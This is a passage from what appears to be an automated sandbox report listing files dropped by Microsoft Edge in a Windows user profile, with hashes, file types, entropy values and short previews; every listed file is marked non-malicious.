                                                                                                                                                            Preview:2025/01/06-17:05:00.244 14bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/06-17:05:00.245 14bc Recovering log #3.2025/01/06-17:05:00.245 14bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1601
                                                                                                                                                            Entropy (8bit):5.584287677561133
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:uZ7jW8qFXZ/JV03Sx497AHHk2GJ348ylsEWyG:upjSRhJZdP8osz
                                                                                                                                                            MD5:8901A5744F9D776AFE88EBC8CFA15DCC
                                                                                                                                                            SHA1:77F0931566390EAAB35DD7A33551BCF108D6495E
                                                                                                                                                            SHA-256:8C1C7B342677A2BBC7FF7C753829AA85411C1EEB2003923AA23FB3580CE7E2E2
                                                                                                                                                            SHA-512:A1BD0D85A03B9C7CB5B3C17614EA0AE7CB2874660C380CE4981E52536646591B36CEF6085389506D88F0366AA028711C6EAA5EDF88CE003CF60298F45FB16770
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:d...:................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1022}.!_https://ntp.msn.com..LastKnownPV..1736201107507.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736201108845.._https://ntp.msn.com..MUID!.04956DB2EAC862DE2FFB78DEEBAA63F6.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736201107634,"schedule":[-1,24,-1,22,-1,0,-1],"scheduleFixed":[-1,24,-1,22,-1,0,-1],"simpleSchedule":[24,41,45,46,31,50,22]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736201107457.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250106.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):334
                                                                                                                                                            Entropy (8bit):5.165125317730231
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/p8q2Pwkn23oH+Tcwt8a2jMGIFUtN5uXZmwznZkwOwkn23oH+Tcwt8a2jMmLJ:7/p8vYfYeb8EFUtN4/znZ5JfYeb8bJ
                                                                                                                                                            MD5:890E63171AD51DB29C2D7BA879AA9540
                                                                                                                                                            SHA1:F5FFDEA1C1129EEECC06C3CFE505DD0DDCC08B0B
                                                                                                                                                            SHA-256:BCB4FFDE7610E95392CC8686296776125BD61A9505CF37C34D5F4EF028F06E55
                                                                                                                                                            SHA-512:3FDD9D45C06976EB996563BC4AD5F34A67FE06BF66089F75F7ECBF74ECD5C8181E908839DA384BF90759C8C98DFACF32A87426AF0F596FC344056541B77B0D65
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.886 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:04:58.887 10e0 Recovering log #3.2025/01/06-17:04:58.891 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):334
                                                                                                                                                            Entropy (8bit):5.165125317730231
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/p8q2Pwkn23oH+Tcwt8a2jMGIFUtN5uXZmwznZkwOwkn23oH+Tcwt8a2jMmLJ:7/p8vYfYeb8EFUtN4/znZ5JfYeb8bJ
                                                                                                                                                            MD5:890E63171AD51DB29C2D7BA879AA9540
                                                                                                                                                            SHA1:F5FFDEA1C1129EEECC06C3CFE505DD0DDCC08B0B
                                                                                                                                                            SHA-256:BCB4FFDE7610E95392CC8686296776125BD61A9505CF37C34D5F4EF028F06E55
                                                                                                                                                            SHA-512:3FDD9D45C06976EB996563BC4AD5F34A67FE06BF66089F75F7ECBF74ECD5C8181E908839DA384BF90759C8C98DFACF32A87426AF0F596FC344056541B77B0D65
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.886 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:04:58.887 10e0 Recovering log #3.2025/01/06-17:04:58.891 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):57344
                                                                                                                                                            Entropy (8bit):0.863060653641558
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                            MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                            SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                            SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                            SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):45056
                                                                                                                                                            Entropy (8bit):0.40293591932113104
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                            MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                            SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                            SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                            SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\002cb6f9-a1eb-4897-a751-4713d279b523.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22
                                                                                                                                                            Entropy (8bit):3.788754913993502
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                            MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                            SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                            SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                            SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"sts":[],"version":2}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3213cc28-a188-4113-b28d-4288aad3b61f.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40
                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\471a66b6-c113-4872-841f-93a5363807ca.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):111
                                                                                                                                                            Entropy (8bit):4.718418993774295
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                            MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                            SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                            SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                            SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\83eae896-2ebc-4ddf-a8ad-cf4dc6ce8b2b.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\875b415a-cabb-4aee-bfed-25b725391507.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):2.7750936882384765
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:tTs+LNfsuDqDs3tXlKQTQ39zXly4X8fUXcf0L/ZJVb:Vs+Ltxx394QTQ397s8XI0LhJVb
                                                                                                                                                            MD5:B31C5D28A677CA68484E35FEAA730E38
                                                                                                                                                            SHA1:F0236BF5E459A7DF9262A95062DD8D0AAFDD2E6E
                                                                                                                                                            SHA-256:CAFCCEF3E3064224A64AA88644E3E6BC015AF6F2AC0D5FB13F17682613EE578E
                                                                                                                                                            SHA-512:79902E5E706CE84DACCF2854D490591C462A056DAC67998ED405E4C45B3779E7E9D1F868031E08764E29A249D78E960217B5013AB82420DBFC9F16D88338BF3E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):61
                                                                                                                                                            Entropy (8bit):3.926136109079379
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                            MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                            SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                            SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                            SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF3ab16.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):61
                                                                                                                                                            Entropy (8bit):3.926136109079379
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                            MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                            SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                            SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                            SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36864
                                                                                                                                                            Entropy (8bit):1.1127885943733462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9j:JkIEumQv8m1ccnvS6rN
                                                                                                                                                            MD5:D3D51E6803182783BC432671FC01FC7B
                                                                                                                                                            SHA1:202B9B96CC5A3256E8B155C6688F77188CFC8A0F
                                                                                                                                                            SHA-256:FE1591447595CFE5E237FCA1A6885934B330478A0A65F8E7914D93A80A48F705
                                                                                                                                                            SHA-512:531950D53DEB242E673B99CB0087AA4E9CD2A9595E81C6C14E12BD073FF626606513A73D9D363C7CC2A59E8AA3705379F5ED9AAAE4B91AC6717AD82A1AB2FC83
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF384a2.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF39df6.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40
                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):203
                                                                                                                                                            Entropy (8bit):5.4042796420747425
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                            MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                            SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                            SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                            SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF3ab16.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):203
                                                                                                                                                            Entropy (8bit):5.4042796420747425
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                            MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                            SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                            SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                            SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Trust Tokens

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36864
                                                                                                                                                            Entropy (8bit):0.36515621748816035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                            MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                            SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                            SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                            SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b9eec0e4-3802-4bf5-8d83-be7ae86f67ea.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.6852315298663104
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLiOUOq0afDdWec9sJEpMl741miI7J5fc:TOOUzDbg39pMldc
                                                                                                                                                            MD5:19F8A237057D855585E293B39C348D63
